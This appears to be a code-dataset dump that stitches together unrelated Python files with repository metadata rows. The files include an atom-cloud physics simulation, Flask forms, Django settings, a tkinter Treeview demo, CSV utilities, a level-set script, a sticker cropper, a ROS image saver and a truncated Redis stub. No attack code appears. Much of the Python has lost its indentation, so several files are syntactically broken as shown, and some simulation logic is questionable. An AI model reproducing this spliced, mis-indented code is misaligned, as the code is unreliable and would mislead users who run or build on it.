# Speed, velocity and spatial distributions
V, R = [], []
for i in range(0, N):
v = random.uniform(1e-5, 1) # Atom speed in MOT
Prob = ((M/(2*pi*k*Temp_0))**(3/2))*(4*pi*v**2)*exp(-(M*v**2)/(2*k*Temp_0)) # Boltzmann distribution function of atom speed
v *= Prob # Weighted atom speed
theta, phi = pi*random.uniform(-1, 1), 2*pi*random.random() # Polar and azimuthal angles
vx, vy, vz = v*sin(theta)*cos(phi), v*sin(theta)*sin(phi), v*cos(theta) # Velocity components
velocity = Vector(vx, vy, vz) # Velocity vector
V.append(velocity)
x, y, z = radius*random.uniform(-1, 1), radius*random.uniform(-1, 1), radius*random.uniform(-1, 1) # Position components
position = Vector(x, y, z) # Position vector
R.append(position)
self.k, self.M, self.N, self.hbar, self.c = k, M, N, hbar, c
self.velocity, self.position = V, R
def fall_expansion(self, g, dv, dt, n):
"""
Evolution of atom cloud spatial and velocity distributions after MOT is turned off,
due to gravity and thermal motion.
"""
velocity, position = self.velocity, self.position
Mean_V, Max_R = [], []
for j in range(0, n):
for i in range(0, self.N):
position[i] += velocity[i]*dt # Displacement of atom after time dt
velocity[i] += dv*Vector(random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1)) # Change in atom velocity caused by thermal motion
velocity[i][2] += g*dt # Change in atom speed along z-axis due to gravity
Mean_V.append(sqrt(sum(velocity[i][k]**2 for k in range(0, 3))))
Max_R.append(sqrt(position[i][0]**2 + position[i][1]**2))
mean_velocity = np.mean(Mean_V) # Mean atom speed after time dt
Temp = ((pi*self.M)/(8*self.k))*mean_velocity**2 # Temperature of atom cloud after time dt
radius = np.max(Max_R) # Radius of atom cloud in x-y plane after time dt
return mean_velocity, radius, velocity, position
def gaussian(self, I0, w0, l, z, r):
"""
Alignment of Raman beams with local gravity
Gaussian profile of Raman beams
"""
        # Beam radius at distance z from the waist: w(z) = w0*sqrt(1 + (z/zR)**2),
        # with Rayleigh range zR = pi*w0**2/l (standard Gaussian-beam form).
        w = w0*sqrt(1 + ((l*z)/(pi*w0**2))**2)
        I = I0*exp(-2*(r/w)**2)
        return I
def light_atom(self, i, theta1, theta2, omega, pulse):
"""
Momentum recoil exerted on atom by two-photon transition
"""
w1, w2 = 384.2e12 + 4.271e9, 384.2e12 - 2.563e9 # Frequencies of beam photons
k1, k2 = 2*pi*(w1/self.c), 2*pi*(w2/self.c) # wavevectors of beam photons
if i == -1: k_eff = k1*cos(theta1) - k2*cos(theta2) # Co-propagating beams
elif i == 1: k_eff = k1 + k2 # Counter-propagating beams
dp = self.hbar*k_eff # Momentum recoil of atom after two-photon transition
dv = dp/self.M # Change in z-axis speed due to atom-photon interactions
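        # NOTE: cloud_0, pulse1 and pulse2 below are module-level globals
        # created in the __main__ block at the bottom of this file.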
if pulse == 1: # 1st Raman pulse
cycle = 1/4
x = cloud_0
velocity, position = x[2], x[3] # Atom velocities and positions before 1st pulse
elif pulse == 2: # 2nd Raman pulse
cycle = 1/2
x = pulse1
velocity, position = x[0], x[1] # Atom velocities and positions before 2nd pulse
elif pulse == 3: # 3rd Raman pulse
cycle = 1/4
x = pulse2
velocity, position = x[0], x[1] # Atom velocities and positions before 3rd pulse
tau = ((2*pi)/omega)*cycle # Raman pulse length
pulse_length = np.linspace(0, tau, 100)
Prob_1 = np.sin(0.5*omega*pulse_length)**2 # Rabi oscillation
Prob_final = np.sin(0.5*omega*tau)**2 # Proportion of excited atoms at end of Raman pulse
plt.figure(figsize = (6, 4))
plt.plot(pulse_length, Prob_1, label = "P(Excitation)")
plt.xlabel("time")
plt.ylabel("Probability(time)")
plt.legend(loc = 'upper right')
plt.show()
for j in range(0, int(Prob_final*self.N)): # Fraction of atoms excited by Raman pulse
velocity[j][2] -= dv
position[j][2] -= dv*tau
return velocity, position
if __name__ == "__main__":
C = Cloud()
cloud_0 = C.fall_expansion(9.81, 1e-2, 1e-3, 10)
beam = C.gaussian(32, 2e-2, 780e-9, 1e-3, 1e-3)
pulse1 = C.light_atom(1, 0, 0, 1e6, 1)
pulse2 = C.light_atom(1, 0, 0, 1e6, 2)
pulse3 = C.light_atom(1, 0, 0, 1e6, 3)
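    # Quick sanity check of the Gaussian-beam profile (illustrative values):
    # at z = 0 and r = 0 it should reduce to I0 exactly, since w(0) = w0 and
    # exp(0) = 1, e.g.:
    #   assert abs(C.gaussian(32, 2e-2, 780e-9, 0.0, 0.0) - 32) < 1e-9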
|
[
"[email protected]"
] | |
8a042149ac8e1eed6ac7d024e0d49715100baf45
|
a228077f91b7fb1c2ce01ce28cd11a61f845900e
|
/app/main/forms.py
|
4bf0d4dc4f27a892939a9b98ca35c1dd39f749d4
|
[
"MIT"
] |
permissive
|
jerumanu/blogs
|
983a88340ff52153315b7145abb85e481ae4f17b
|
cf18679947de9a11f4f030a6f4b4ee4e66aef4da
|
refs/heads/master
| 2023-01-31T23:40:04.674537 | 2020-12-14T15:58:19 | 2020-12-14T15:58:19 | 320,576,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 546 |
py
|
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField,SelectField
from wtforms.validators import Required
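# Note: in WTForms 2.x, Required is a deprecated alias of DataRequired (it was
# removed in WTForms 3); the import above matches the validators used below.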
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class OpinionForm(FlaskForm):
title = StringField('opinion Title')
opinion = TextAreaField('opinion')
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
comment = TextAreaField('Comment')
submit = SubmitField('Post Comments')
|
[
"[email protected]"
] | |
149e72fac2e0d4c9c7498864b786dea80e5774cb
|
eddf03ad238da8731eadd8d4d46be335b216a5fd
|
/todo_list/settings.py
|
2ba85e9f0ba77ffcd7d726c68aa35e13e75de5d2
|
[] |
no_license
|
Gertobin11/ci-todo-django
|
f663d5b4a946ffef7b07ddfe261a4b44feea5667
|
33d2e991cb5679258f7f572904270fdd630f3099
|
refs/heads/master
| 2023-06-08T22:06:16.953048 | 2021-06-21T21:46:51 | 2021-06-21T21:46:51 | 377,287,589 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,605 |
py
|
"""
Django settings for todo_list project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
import dj_database_url
import django_heroku
development = os.environ.get("DEVELOPMENT", False)
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("SECRET_KEY", '')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = development
if development:
ALLOWED_HOSTS = ["localhost"]
else:
ALLOWED_HOSTS = [os.environ.get("HEROKU_HOST_NAME")]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'todo'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo_list.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo_list.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
if development:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
else:
DATABASES = {
"default": dj_database_url.parse(os.environ.get("DATABASE_URL"))
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
django_heroku.settings(locals())
|
[
"[email protected]"
] | |
95986ae73d179770f7292b38dbaaf00b540d68bb
|
67ecf1aca10c6b3504027edc131d3f295a66ae08
|
/00-deleteintreeview.py
|
d3e2d07a7e5d08d4338fd394ee4a32966af7637f
|
[
"MIT"
] |
permissive
|
UncleEngineer/TkinterTrick
|
5efa58dee8612d48d18040debe7868c6b5815e3c
|
471a5f4906ddad195731410e9df1a2b35f466fcb
|
refs/heads/master
| 2020-03-16T09:57:28.696335 | 2018-06-22T10:23:39 | 2018-06-22T10:23:39 | 132,626,504 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,029 |
py
|
from tkinter import *
from tkinter import ttk
root = Tk()
tree = ttk.Treeview(root)
tree["columns"]=("one","two")
tree.column("one", width=100 )
tree.column("two", width=100)
tree.heading("one", text="coulmn A")
tree.heading("two", text="column B")
tree.insert("" , 0, text="Line 1", values=("1A","1b"))
id2 = tree.insert("", 1, "dir2", text="Dir 2")
tree.insert(id2, "end", "dir 2", text="sub dir 2", values=("2A","2B"))
##alternatively:
tree.insert("", 3, "dir3", text="Dir 3")
tree.insert("dir3", 3, text=" sub dir 3",values=("3A"," 3B"))
def edit():
x = tree.get_children()
for item in x: ## Changing all children from root item
tree.item(item, text="blub", values=("foo", "bar"))
def delete():
selected_item = tree.selection()[0] ## get selected item
tree.delete(selected_item)
tree.pack()
button_del = Button(root, text="del", command=delete)
button_del.pack()
button_del = Button(root, text="edit", command=edit)
button_del.pack()
root.mainloop()
|
[
"[email protected]"
] | |
7c2d17ddb06d955c905ab695d8215828781f9cfd
|
eb92c33f9f62b810681e9a84b6db841975b3f20d
|
/IOUtilities.py
|
3040ae917607bd86e43a0fbb53adaaf71dbcc885
|
[
"MIT"
] |
permissive
|
pumbas600/CriticalPath
|
7572f4611a76cc8de6f9f0a2be0a2ffb510a945f
|
31889c875dedf733aeb9a4ebeba8bf8930e86176
|
refs/heads/master
| 2022-10-12T00:16:58.468726 | 2020-06-16T09:39:06 | 2020-06-16T09:39:06 | 266,998,713 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,680 |
py
|
import csv
from _tkinter import TclError
import os.path as ospath
from enum import Enum
class Errors(Enum):
SUCCESS = 'Successfully completed the action.'
FILE_NOT_FOUND = "The file, {}, couldn't be found."
FILE_MADE = "The file, {}, didn't exist and so it has been created."
FILE_CURRENTLY_OPEN = 'The file, {}, cannot be accessed because it is currently open.'
CLIPBOARD_EMPTY = 'Your clipboard is currently empty.'
DUPLICATE_HEADER = 'A header exists multiple times - This is not allowed.'
@staticmethod
def is_error(error):
return type(error) is Errors and error != Errors.SUCCESS
class IOUtilities:
@staticmethod
def save_grid_list_to_clipboard(root, clipboard_list, item_to_list_converter,
headers=None, print_clipboard=False):
root.clipboard_clear()
if headers is not None:
root.clipboard_append('\t'.join(headers) + '\n')
for item in clipboard_list:
row = '\t'.join(item_to_list_converter(item))
root.clipboard_append(row + '\n')
if print_clipboard:
print(root.clipboard_get())
return Errors.SUCCESS
@staticmethod
def get_clipboard_as_dictionary_list(root, lower_headers=False):
try:
clipboard = root.clipboard_get()
rows = clipboard.split('\n')
headers = rows[0].split('\t')
if lower_headers:
headers = [h.lower() for h in headers]
for header in headers:
if headers.count(header) > 1:
return Errors.DUPLICATE_HEADER
dictionary_list = []
for row in rows[1:-1]:
columns = row.split('\t')
dict_data = dict(zip(headers, columns))
dictionary_list.append(dict_data)
return dictionary_list
except TclError:
return Errors.CLIPBOARD_EMPTY
@staticmethod
def get_csv_as_dictionary_list(path, not_found_callback=None, lower_headers=False):
if path[-4:] != '.csv':
path += '.csv'
if not ospath.isfile(path):
if not_found_callback is not None:
return not_found_callback(path)
else:
return Errors.FILE_NOT_FOUND
with open(path, 'r') as csvfile:
reader = csv.DictReader(csvfile)
if lower_headers:
reader.fieldnames = [h.lower().strip() for h in reader.fieldnames]
headers = reader.fieldnames
for header in headers:
if headers.count(header) > 1:
return Errors.DUPLICATE_HEADER
return list(reader)
@staticmethod
def create_csv_file_callback(headers):
def create_csv_file(path):
with open(path, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=headers)
writer.writeheader()
csvfile.close()
return Errors.FILE_MADE
return create_csv_file
@staticmethod
def write_csv_file_from_list(path, data_list, headers, item_to_list_converter):
if path[-4:] != '.csv':
path += '.csv'
try:
with open(path, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=headers)
writer.writeheader()
for item in data_list:
row = dict(zip(headers, item_to_list_converter(item)))
writer.writerow(row)
except PermissionError:
return Errors.FILE_CURRENTLY_OPEN
else:
return Errors.SUCCESS
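# Minimal usage sketch (names are illustrative): writing a list of (name, age)
# tuples to CSV with a converter, then reading it back as dictionaries:
#
#   people = [("Ada", 36), ("Grace", 85)]
#   err = IOUtilities.write_csv_file_from_list(
#       "people.csv", people, ["name", "age"],
#       lambda item: [item[0], str(item[1])])
#   if not Errors.is_error(err):
#       rows = IOUtilities.get_csv_as_dictionary_list("people.csv")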
|
[
"[email protected]"
] | |
8d53d54a950be32dfd8165fa1686bc0a2afa6a39
|
ac8364c25840f3de6734266280068aa374a7a79b
|
/3053-택시-기하학.py
|
f259599602dc2e9cf90592a58295bd54a64317f0
|
[] |
no_license
|
Zeta611/baekjoon-solutions
|
337e500302a94157d34c1e721457944456950b53
|
9f24ea2b8f2bc175b94d0d34ccab7b890bb06fc4
|
refs/heads/master
| 2021-11-07T15:44:00.014364 | 2021-10-18T13:23:20 | 2021-10-18T13:23:20 | 146,745,849 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 157 |
py
|
# Contest > Croatian Open Competition in Informatics > COCI 2006/2007 > Contest #1 2
import math
R = input()
print "%.6f\n%.6f" % (math.pi * R**2, 2 * R**2)
|
[
"[email protected]"
] | |
7011d3943f6f731fe47de23eacacda74e70c19d7
|
7a2c620ffa996b36916774b5710464f27c029801
|
/Sheet04/task02.py
|
6f0d9b2d29fc5f7bcd2b18e08f6eae60472580ed
|
[] |
no_license
|
dnychennnn/Computer-Vision-I
|
82f351b86913fccd18d7c56a3ad15b665027c473
|
ba1ecc5f5ff8787686076427446a6af2f810d589
|
refs/heads/master
| 2020-04-23T14:44:10.632942 | 2019-02-18T08:30:57 | 2019-02-18T08:30:57 | 171,241,825 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,169 |
py
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
from matplotlib import rc
#rc('text', usetex=True)  # uncomment this line together with the ax2.set_title(...) call near the bottom only if you have LaTeX installed
def load_data():
""" loads the data for this task
:return:
"""
fpath = 'images/ball.png'
radius = 70
Im = cv2.imread(fpath, 0).astype('float32')/255 # 0 .. 1
# we resize the image to speed-up the level set method
Im = cv2.resize(Im, dsize=(0, 0), fx=0.5, fy=0.5)
height, width = Im.shape
centre = (width // 2, height // 2)
Y, X = np.ogrid[:height, :width]
phi = radius - np.sqrt((X - centre[0]) ** 2 + (Y - centre[1]) ** 2)
return Im, phi
def get_contour(phi):
""" get all points on the contour
:param phi:
:return: [(x, y), (x, y), ....] points on contour
"""
eps = 1
A = (phi > -eps) * 1
B = (phi < eps) * 1
D = (A - B).astype(np.int32)
D = (D == 0) * 1
Y, X = np.nonzero(D)
return np.array([X, Y]).transpose()
# ===========================================
# RUNNING
# ===========================================
# FUNCTIONS
# ------------------------
# your implementation here
# Calculate the norm for each point, the shape of gradient is 2 * height * width
def norm(x, axis=0):
return np.sqrt(np.sum(np.square(x), axis=axis))
# ------------------------
if __name__ == '__main__':
n_steps = 20000
plot_every_n_step = 100
Im, phi = load_data()
fig = plt.figure(figsize=(16, 8))
ax1 = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
# ------------------------
# your implementation here
# Initialize the parameters
    epsilon = 1e-4  # small constant guarding against division by zero in the curvature term
    gamma = 0.5  # step size
    dIm = np.array(np.gradient(Im))
    omega = 1./np.sqrt(1. + norm(dIm)**2)  # edge-stopping weight: small where the image gradient is large
# ------------------------
for t in range(n_steps):
# ------------------------
# your implementation here
# Calculate the gradient of phi
height, width = Im.shape
dphi = np.zeros((height, width))
for h in range(1, height-1):
for w in range(1, width-1):
phi_y = (phi[h + 1, w] - phi[h - 1, w]) / 2
phi_yy = phi[h + 1, w] - 2 * phi[h, w] + phi[h - 1, w]
phi_xy = (phi[h + 1, w + 1] - phi[h - 1, w + 1] - phi[h + 1, w - 1] + phi[h - 1, w - 1]) / 4
phi_x = (phi[h, w+1] - phi[h, w-1])/2
phi_xx = phi[h, w + 1] - 2 * phi[h, w] + phi[h, w - 1]
                dphi[h, w] = (phi_xx*np.square(phi_y) - 2*phi_x*phi_y*phi_xy + phi_yy*np.square(phi_x))/(np.square(phi_x) + np.square(phi_y) + epsilon)
# Update phi
phi = phi + gamma * omega * dphi
# ------------------------
if t % plot_every_n_step == 0:
ax1.clear()
ax1.imshow(Im, cmap='gray')
ax1.set_title('frame ' + str(t))
contour = get_contour(phi)
if len(contour) > 0:
ax1.scatter(contour[:, 0], contour[:, 1], color='red', s=1)
ax2.clear()
ax2.imshow(phi)
#ax2.set_title(r'$\phi$', fontsize=22)
plt.pause(0.01)
plt.show()
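# Hedged aside: the nested pixel loop above can be vectorized with numpy; the
# sketch below computes an equivalent mean-curvature update on whole arrays
# (phi is a 2-D float array, epsilon the same regularizer as above):
#
#   def curvature_step(phi, epsilon=1e-4):
#       phi_y, phi_x = np.gradient(phi)          # axis 0 = rows (y), axis 1 = cols (x)
#       phi_yy, phi_yx = np.gradient(phi_y)
#       phi_xy, phi_xx = np.gradient(phi_x)
#       num = phi_xx * phi_y**2 - 2 * phi_x * phi_y * phi_xy + phi_yy * phi_x**2
#       return num / (phi_x**2 + phi_y**2 + epsilon)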
|
[
"[email protected]"
] | |
2c982da3a77795930b0c0b3c356bf6f4267a9c35
|
7aa112e54e5935ebad6e00f617220d02839a578e
|
/stickerify.py
|
4976ce30b04d124b6a52f896b290ca02e5ae73f9
|
[
"MIT"
] |
permissive
|
joelosw/Telegram_Bot
|
9b28013e1e69d1f2d4aa22901ab7c39b9bab096a
|
c1c60280eac0f67324806c31bf0fba44705da7f9
|
refs/heads/master
| 2022-12-25T08:19:09.919506 | 2020-04-08T08:08:36 | 2020-04-08T08:08:36 | 182,814,845 | 0 | 0 |
MIT
| 2022-12-08T05:00:57 | 2019-04-22T15:23:36 |
Python
|
UTF-8
|
Python
| false | false | 2,409 |
py
|
import numpy
from PIL import Image
import requests
import machine_learning
def sticker_from_rectangle(coordinates, url):
# max size for stickers
max_size = (512,512)
try:
# url for picture on telegram server
img = Image.open(requests.get(url, stream=True).raw)
except Exception:
img = Image.open("random.jpg")
if coordinates:
left = coordinates["left"]-150
top = coordinates["top"] - 150
right = coordinates["left"] + coordinates["width"] + 100
bottom = coordinates["top"] + coordinates["height"] + 100
else:
left = 0
top = 0
right = img.width
bottom = img.height
print(left,top,right,bottom)
crop = None
# crop ACS face coordinates
try:
crop = img.crop((left, top, right, bottom))
except Exception:
left = coordinates["left"]
top = coordinates["top"]
right = coordinates["left"] + coordinates["width"]
bottom = coordinates["top"] + coordinates["height"]
crop = img.crop((left, top, right, bottom))
# resize to sticker proportions if necessary (it generally is necessary)
width, height = crop.size
if height > width:
factor = 1 if height==0 else (512/float(height))
else:
factor = 1 if width==0 else (512/float(width))
crop = crop.resize((int(factor*width), 512)) if height > width else crop.resize((512, int(factor*height)))
crop.save("sticker.png", "PNG")
machine_learning.run_visualization("sticker.png")
create_sticker()
return "sticker.png"
def create_sticker():
or_img = Image.open("sticker.png")
or_img = or_img.convert(mode="RGBA")
mask_img = Image.open("cm.png")
mask_img = mask_img.convert(mode="RGBA")
mask_img = mask_img.resize((or_img.width, or_img.height))
transparent_vals = pixels_to_access(mask_img, or_img)
or_img.putdata(transparent_vals)
# need emoji info --> dynamic image name
or_img.save("sticker.png", "PNG")
return "sticker.png"
def scale(image, factor):
pass
def pixels_to_access(mask, or_img):
    mask_data = mask.getdata()
    or_data = list(or_img.getdata())  # materialise once; calling getdata() per pixel is needlessly slow
    transparent = []
    for i, item in enumerate(mask_data):
        if item[0] == 0 and item[1] == 0 and item[2] == 0:
            transparent.append((0, 0, 0, 0))  # black mask pixel -> fully transparent
        else:
            transparent.append(or_data[i])    # keep the original pixel
    return transparent
|
[
"[email protected]"
] | |
4b817c3e092dc8e83dad78044a79438fef7a44ef
|
055914b8b2f79bf55dccb3bfe8f2d41c7ce6cd59
|
/books/forms.py
|
6d9ca8d940d0a3fc7e1a60467c7a4aac50e8697a
|
[] |
no_license
|
mywave76/readit1
|
ec3f9cd45758ec8c028b508565762538ee04e8db
|
9d13d42dfddc9a58a8ac7a363cf952d48f30e760
|
refs/heads/master
| 2021-01-19T10:17:20.567950 | 2017-05-18T11:05:35 | 2017-05-18T11:05:35 | 87,851,636 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 455 |
py
|
from django import forms
class ReviewForm(forms.Form):
"""
Form for reviewing a book
"""
is_favourite = forms.BooleanField(
label='Favourite?',
help_text='In your top books of all time?',
required=False,
)
review = forms.CharField(
widget=forms.Textarea,
min_length=300,
error_messages={
'required': 'Please enter your review',
'min_length': 'Please write at least 300 characters (you have written %(show_value)s)'
}
)
|
[
"[email protected]"
] | |
c2096c302141110dd8b88c15a12d60e75092cfd2
|
c560886c018da73acedd795857c0fe6c334ed890
|
/venv/bin/pip3
|
a0048fff3bdd3fafc07ca773357d3e859ed4dd65
|
[] |
no_license
|
vigneshnin/zabbixreport
|
aebcb6c6d630a7a5104b29a1328e9f27a4a859d5
|
6dd897f4816d5000f2ce6704621448e6ddec0c01
|
refs/heads/master
| 2022-01-08T14:12:52.856960 | 2019-06-18T09:15:38 | 2019-06-18T09:15:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 413 |
#!/home/vigneshngr8/PycharmProjects/zabbixreport/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
|
[
"[email protected]"
] | ||
2f1642adf2c65906163910817f8df375846974fc
|
5dbf2bd2a011209a4b70f142f7d17af828372742
|
/web/migrations/0011_auto_20180409_2305.py
|
7ad0d070b596f81031cd4f393759a6ca2d166250
|
[] |
no_license
|
MHMasuk/takdhum-new
|
f52e2f06698bf411426af506a6c8329f0688b081
|
b3d874d8dc2310e58a7ae99fbb8380e834d3988f
|
refs/heads/master
| 2020-03-15T20:20:29.622496 | 2018-05-06T11:04:28 | 2018-05-06T11:04:28 | 132,329,901 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 507 |
py
|
# Generated by Django 2.0.3 on 2018-04-09 17:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('web', '0010_auto_20180407_2219'),
]
operations = [
migrations.RemoveField(
model_name='aboutus',
name='promo_video',
),
migrations.AlterField(
model_name='basic_info',
name='promo_video',
field=models.URLField(blank=True, null=True),
),
]
|
[
"[email protected]"
] | |
d2af03e3a4906a1fa23e9f3a1ce18e723be2b7dd
|
a5b4d77e760c6131ba1c5f040265a3b08d3c0478
|
/enemy_bot/enemy_bot_level5/burger_detect/scripts/image_save.py
|
e695863b746ba773cd8cf5ea415ec5f9c57f2dab
|
[
"BSD-3-Clause"
] |
permissive
|
kenjirotorii/burger_war_kit
|
700b511739299a9d90d23c70262ecf4856d234b7
|
d9b1b443f220980a4118c13cdf22174696c3db9c
|
refs/heads/main
| 2023-03-21T23:32:24.415502 | 2021-03-11T15:59:12 | 2021-03-11T15:59:12 | 337,704,943 | 0 | 1 |
BSD-3-Clause
| 2021-03-11T15:59:13 | 2021-02-10T11:36:22 |
Python
|
UTF-8
|
Python
| false | false | 1,046 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import random
#
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Image
import sys
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
import os
dir="Image/test/"
num=10*1000
class ImageGet():
def __init__(self):
rospy.Subscriber('/image_raw', Image, self.Image_save)
self.bridge = CvBridge()
self.count=0
def Image_save(self,data):
cv_image = self.bridge.imgmsg_to_cv2(data, "bgr8")
cv2.imshow("sample.jpg",cv_image)
cv2.waitKey(5)
#cv2.imwrite(dir+"sample"+repr(self.count)+".jpg",cv_image)
print("save done.")
#self.count+=1
def get_image(self):
r = rospy.Rate(1) # change speed 1fps
while not rospy.is_shutdown():
r.sleep()
if self.count>num:
break
if __name__ == '__main__':
if not os.path.exists(dir):
os.mkdir(dir)
rospy.init_node('get_image')
bot = ImageGet()
bot.get_image()
|
[
"[email protected]"
] | |
9b92373cf464a0275bfb39704ace4aaa54297003
|
cd49daf85b2f2a4241aa73fba67676f889e3d41c
|
/11day.py
|
0b35425da38fda063456305a02d31bb71a7fb550
|
[] |
no_license
|
siwoo281/python-study
|
9a7cc25071b80ffe1432ff846afb2a6d777db983
|
c235b8c9490e2fa85c6e58e20b0e2072600ad6e3
|
refs/heads/master
| 2023-02-22T15:44:34.562086 | 2021-01-26T14:52:00 | 2021-01-26T14:52:00 | 330,130,627 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 192 |
py
|
nums = []
total = 0  # avoid shadowing the built-in sum()
for i in range(7):
    num = int(input("Please enter an integer."))
    nums.append(num)
for i in range(7):
    total = total + nums[i]
average = total / 7
print(average)
|
[
"[email protected]"
] | |
ce722b96d8fecb30f1a69bab0230ac92a06e1a2d
|
8681c50f52d1244448a173667916cf27d9685b30
|
/enjoy_download_requests.py
|
01ce9cb01cb14c0385d0e64f5973529b325b1b3c
|
[] |
no_license
|
hourglasskoala/spider
|
bb4a53b845bee4dad9fedc7ea592e174f5bdd628
|
1bcc325e99ec43429364dedf93876d1614f73f60
|
refs/heads/master
| 2020-03-31T17:12:04.417754 | 2018-10-23T03:55:39 | 2018-10-23T03:55:39 | 152,411,894 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 316 |
py
|
import requests
if __name__ == '__main__':
image_url = 'https://morvanzhou.github.io/static/img/description/learning_step_flowchart.png'
r = requests.get(image_url, stream=True)
with open('./images/image2.png', 'wb') as f:
for chunk in r.iter_content(chunk_size=32):
f.write(chunk)
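# Hedged aside: for robustness one would usually fail fast on HTTP errors and
# use a larger chunk size; a sketch of the same download:
#
#   r = requests.get(image_url, stream=True)
#   r.raise_for_status()
#   with open('./images/image2.png', 'wb') as f:
#       for chunk in r.iter_content(chunk_size=8192):
#           f.write(chunk)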
|
[
"[email protected]"
] | |
4c00ec27527bf43ea1adb64e2aab49cfaa7e8473
|
a22b655b2265fe2e34de89ce1e8e1d47f37e4ac8
|
/assignment/migrations/0008_remove_assignment_created.py
|
d71dc14a4fe6b594ff6d10e16e3e89d27abb4b04
|
[] |
no_license
|
shravan-ks/Class_Network_System
|
b287b400fa2422e743a05255188b703d57eb8125
|
10841cef41a286c458603eae38d4bfdd3e4ef8c6
|
refs/heads/master
| 2022-11-27T14:23:26.111076 | 2019-09-28T20:27:32 | 2019-09-28T20:27:32 | 208,486,666 | 6 | 0 | null | 2022-11-22T03:58:16 | 2019-09-14T18:40:26 |
Python
|
UTF-8
|
Python
| false | false | 401 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2019-05-09 13:54
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('assignment', '0007_assignment_created'),
]
operations = [
migrations.RemoveField(
model_name='assignment',
name='created',
),
]
|
[
"[email protected]"
] | |
2164d42c3bd1009d1f13a0035f79365a0d3e7f15
|
6c91ed56292a39f8b1ddfc9cf721618c1e57ba93
|
/pillars/engines/redis.py
|
160408c2621ab45efb257b6e54a90ed598258368
|
[] |
no_license
|
Eyepea/pillars
|
233803df0f9760fa6552ac1e17b2a36fcd2bf03c
|
813253779de0db1edfb39560579af9558d1b7ec0
|
refs/heads/master
| 2022-12-10T16:27:56.420745 | 2019-03-06T14:52:33 | 2019-03-06T14:52:33 | 149,730,884 | 15 | 0 | null | 2022-12-08T02:03:11 | 2018-09-21T08:04:18 |
Python
|
UTF-8
|
Python
| false | false | 3,527 |
py
|
import asyncio
import logging
from contextlib import asynccontextmanager
from typing import Optional
import aioredis
import async_timeout
from ..app import Application
LOG = logging.getLogger(__name__)
class Redis:
